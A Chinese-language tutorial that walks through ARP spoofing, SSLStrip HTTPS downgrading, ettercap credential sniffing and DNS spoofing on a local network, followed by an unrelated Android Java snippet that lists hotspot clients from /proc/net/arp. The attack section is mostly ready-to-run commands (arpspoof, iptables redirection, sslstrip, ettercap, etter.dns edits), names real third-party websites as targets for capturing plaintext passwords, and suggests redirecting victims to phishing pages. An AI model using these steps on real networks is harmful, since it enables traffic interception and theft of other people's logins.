ARP协议是这样工作的：如win10需要给win7（IP为192.168.40.130)发送数据，为了知道谁是win7，首先win10发送一个广播包给网内所有机器“谁是192.168.40.130”，正常情况其他机器忽略该消息，仅win7回复“我是192.168.40.130”，于是通信就可以开始。所有的主机维护他们自己的ARP缓存表，所以不会每一次都发送广播，ARP表中包含IP对应的MAC地址。

如何进行ARP欺骗?

例如kali需要对win7进行arp欺骗，那他就不再忽略win10发送的消息，他也会大量的发送数据包回复“啊啊啊！我才是192.168.40.130”，然后win10就会错误地建立或者更新了自己ARP表。然后win10发送数据时都发到kali那去了。

攻击准备

mac 下准备

1. 安装 macports 官网
2. 更新 macports sudo port -d selfupdate
3. 安装 dsniff（包含 arp 攻击的工具）sudo port install dsniff
4. 安装 nmap brew install nmap (如果没有安装 Homebrew，可以去 Homebrew 官网

linux 下准备

1. 安装 dsniff apt-get install -y dsniff
2. 安装 nmap apt-get install -y nmap

攻击步骤

寻找目标

使用nmap命令扫描局域网，获得主机列表
如果所在局域网路由器地址是 192.168.40.1,可以使用 nmap -sP 192.168.40.1/24 扫描

-sP 表示使用 ping 方式扫描，192.168.40.1/24”表示扫描”192.168.40.1-192.168.40.254”这个网段的所有机器。

开启 IP 转发

ARP欺骗一般目的是把自己伪装成网关，但如果不作处理，当被欺骗数据包到达后就会被本机丢弃（因为本机不是网关，不知道如何处理这类数据包），这会导致没有数据包返回给被欺骗主机，导致断网。这当然是不允许的。开启IP转发功能可以解决该问题。IP转发负责把该类数据包再转发给真正的网关处理，开启IP转发的方法。

mac 下：

1	sysctl -w net.inet.ip.forwarding=1

linux 下：

1	echo 1 >/proc/sys/net/ipv4/ip_forward

ARP 欺骗

假设被攻击的 IP 是 192.168.40.130，局域网的网关是 192.168.40.2，攻击电脑使用的网卡接口是 eth0(可以使用 ifconfig 命令查看）, 则欺骗命令如下：

1 2	arpspoof -i eth0 -t 192.168.40.130 192.168.40.2 #arpspoof是dsniff的一个组件，主要用于进行arp欺骗使用

成功的的话在被攻击主机上arp表如图所示

分析数据

如果 ARP 欺骗成功，则被攻击的设备会把所有数据先传到我们电脑上，接下来可以使用 ettercap 软件来分析数据。

使用driftnet获取图片

安装driftnetapt-get install driftnet

开始获取driftnet -i eth0

找一个http的网站进行测试

1	inurl:“http” -https

例子：http://www.kan-tv.com/

Tips:https因为进行了加密不能直接获取，进行SSLStrip攻击后就可获取了

SSLStrip 攻击

2009年的黑帽大会上，一个名叫Moxie Marlinspike的研究人员,发布了一个叫sslstrip的工具。通过该工具，可以实现对ssl进行中间人攻击。

SSLstrip 也叫 https 降级攻击，攻击者拦截用户流量后，欺骗用户与攻击者进行 http 通信，攻击者与服务器保持正常通信 （http 或 https），从而获取用户信息。

攻击原理

攻击者利用用户对于地址栏中HTTPS与HTTP的疏忽，将所有的HTTPS连接都用HTTP来代替。同时，与目标服务器建立正常的HTTPS连接。由于HTTP通信是没有经过加密传输的，并没有HTTPS安全，所以攻击者能轻松实施嗅探。

1. 通过中间人攻击监听 http 流量
2. 更改重定向链接中的 location，替换 https 为 http，并记录
3. 更改响应内容中的超链接，替换 https 为 http，并记录
4. 与用户进行 http 通信，与服务器进行 https 通信（记录中本应是 https 的请求），从而明文获取用户信息

Tips:

当用户浏览的网页中包含https协议，会被转化为http协议的请求

但是sslstrip也不是万能的， 假如网页中没有https， 但是js代码绑定了跳转到https的协议请求的事件，那么sslstrip就失效了

攻击准备

1. 监听 http 流量

2. 获取 sslstrip工具

   Requirements

   1 2	Python >= 2.5 (apt-get install python) The python "twisted-web" module (apt-get install python-twisted-web)

   1 2 3

   apt-get -y install python python-twisted-web git clone https://github.com/moxie0/sslstrip.git cd sslstrip && python ./setup.py install

攻击步骤

开启内核转发功能保证攻击过程中被攻击者不断网

临时ip转发

1	echo 1 > /proc/sys/net/ipv4/ip_forward

永久ip转发

1 2 3

vim /etc/sysctl.conf net.ipv4.ip_forward = 1 //修改值 sysctl -p /etc/sysctl.conf //使修改生效

把流量导入到 sslstrip 程序

设置iptables以将HTTP通信重定向到sslstrip。
输入命令： iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
其中最后面的端口号（比如上面的 10000）就是 sslstrip 程序监听的端口号

如果攻击完成后要删除这条记录可以输入命令 iptables -t nat -D PREROUTING 1

查看 ip 转发表： iptables -t nat -L

运行arpspoof以说服网络他们应该将流量发送给你

1	arpspoof -i eth0 -t 192.168.40.130 192.168.40.2

启动sslstrip

1 2 3 4 5 6 7 8 9 10 11 12 13 14

sslstrip -l 10000 -w <文件名>，–write = <文件名>指定要登录的文件（可选）。 -p，–post仅记录SSL POST。（默认） -s，–ssl记录往返服务器的所有SSL流量。 -a，–all记录往返服务器的所有SSL和HTTP通信。 -l <端口>，–listen = <端口>用于侦听的端口（默认为10000）。 -f，–favicon根据安全请求替换锁图标。 -k，–killsessions终止正在进行的会话。 -h 打印此帮助消息。 查看端口占用lsof -i tcp:10000 sslstrip -a -k -f -l 10000

可以看到，网页上没有任何不安全的警告或是提示，只是原先的HTTPS连接已经被HTTP连接所替换，并且为增加迷惑性，网页的图标被修改成了一个银色的锁图案。但是，假的毕竟是假的，一方面无法查看到任何证书的信息，另外如果在网址前输入https://，则网页无法发开。因此，sslstrip并不是万能的攻击方法。

使用ettercap对目标主机进行arp攻击，并且开始嗅探密码

终端界面嗅探密码ettercap -Tq -i eth0

1 2 3 4

-P 使用插件 -T 使用基于文本界面 -q 启动安静模式（不回显） -M 启动ARP欺骗攻击

我们使用ettercap的GTK+ GUI图像界面ettercap -G

选择Sniff—-Unified-sniffing，然后选择网卡：eth0(我这里是eth0，大家根据情况选择)。

然后Hosts——Scan for hosts——Hosts list

我们的目标主机ip(192.168.40.130)选定目标主机，然后点add to target 1，将目标主机添加到目标；选定路由，点add to target 2，将路由添加到目标2

添加成功后，点击Mitm——ARP posoning ，勾选sniff remote connections。

之后start——start sniffing开始监听。

点击view——connections查看被攻击机访问的IP，端口，协议，发送和接收的数据包大小。

点击view——profiles查看被攻击机访问的链接。在下方可以查看更清晰的链接访问情况。

当然你也可以通过双击链接来查看profiles details，即访问网站的具体情况。

在这里，如果被攻击机输入密码登陆某一网站，我们可以检测到登陆的用户名及其密码。

这是刚刚检测到的一个用户名和登陆密码。这个网站完全没有对密码进行加密操作，出来的结果也是明文显示的。

这是另外一个站检测出来的，对密码进行了加密。

Tips：其实一个网站如果使用的都是https协议，那么安全性一般做的比较好，数据进行了加密的，也就是说你即使已经把https降低为http，即使捕获到了密码，你也不可能轻易解密的出来。

测试网址

1 2 3 4 5 6

http://www.freemojo.com //http密码明文未加密 http://bbs.ylnet.com.cn/forum.php //http密码加密了 http://www.discuz.net/forum.php //https密码未加密

DNS欺骗

1	leafpad /etc/ettercap/etter.dns

在微软处添加：

`www.baidu.com A 192.168.40.132

ettercap -G（进入图形界面）

重复之前的步骤ARP欺骗的步骤，在start sniffing之前添加一个插件

双击启动dns_spoof

开始嗅探后，我们在目标机中ping一下百度

欺骗成功，如果将192.168.40.132改为钓鱼页面，就可以欺骗到用户账号密码

最后提醒大家，连接公共wifi时一定要小心！

参考资料

如何进行一次完整的 SSLStrip

ARP欺骗之ettercap图形化界面

APR攻击（Arpspoof）

linux ip 转发设置 ip_forward、ip_forward与路由转发

HTTP&HTTPS账号密码获取与ettercap局域网内DNS欺骗

使用ssltrip突破ssl加密截获密码

sslstrip

利用sslstrip和ettercap突破ssl嗅探密码

针对SSL的中间人攻击演示和防范

sslstrip Package Description

Android 开启个人热点时 获取连接人数以及连接上的设备信息

本文转自多看一二 并作补充

起因

最近在开发过程当中，遇到一个需求 ，开启个人热点后需要知道有多少人连上了这个热点 以及这些设备的信息

经过一段时间的摸索和反复的查阅资料，有了下面的代码和解决办法：

首先 连接热点的所有信息都保存在proc/net/arp下面 用re文件管理器可以查看一下

会发现 里面有连接的设备的 ip mac地址 等等

好了 那么问题就简单了

直接贴代码：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89

BufferedReader br = null;
ArrayList<ClientScanResult> result = null;

try {
    result = new ArrayList<>();
    br = new BufferedReader(new FileReader("/proc/net/arp"));//读取这个文件
    String ss=br.toString();
    String line;
    while ((line = br.readLine()) != null) {
        String[] splitted = line.split(" +");//将文件里面的字段分割开来
        if (splitted.length >= 4) {
            // Basic sanity check
            String mac = splitted[3];// 文件中分别是IP address  HW type Flags HW address mask Device 

//然后我们拿取HW address  也就是手机的mac地址进行匹配  如果有 就证明是手机

            if (mac.matches("..:..:..:..:..:..")) {
                boolean isReachable = InetAddress.getByName(splitted[0]).isReachable(reachableTimeout);

                if (!onlyReachables || isReachable) {

                    result.add(new ClientScanResult(splitted[0], splitted[3], splitted[5], isReachable));//最后如果能匹配 那就证明是连接了热点的手机  加到这个集合里 里面有所有需要的信息
                }
            }
        }
    }
} catch (Exception e) {
    CandyLog.e(e.getMessage());
} finally {
    try {
        if (br != null) {
            br.close();
        }
    } catch (IOException e) {
        CandyLog.e(e.getMessage());
    }
}

public class ClientScanResult {

    private String IpAddr;
    private String HWAddr;
    private String Device;
    private boolean isReachable;

    public ClientScanResult(String ipAddr, String hWAddr, String device, boolean isReachable) {
        super();
        this.IpAddr = ipAddr;
        this.HWAddr = hWAddr;
        this.Device = device;
        this.isReachable = isReachable;
    }

    public String getIpAddr() {
        return IpAddr;
    }

    public void setIpAddr(String ipAddr) {
        IpAddr = ipAddr;
    }


    public String getHWAddr() {
        return HWAddr;
    }

    public void setHWAddr(String hWAddr) {
        HWAddr = hWAddr;
    }


    public String getDevice() {
        return Device;
    }

    public void setDevice(String device) {
        Device = device;
    }


    public boolean isReachable() {
        return isReachable;
    }

    public void setReachable(boolean isReachable) {
        this.isReachable = isReachable;
    }

}

好了 想要知道连接人数 只要得到集合的size就可以了 又解决一个问题

关键点在于 热点信息储存在proc/net/arp 里面 有兴趣的可以了解下proc目录 里面有很多很多信息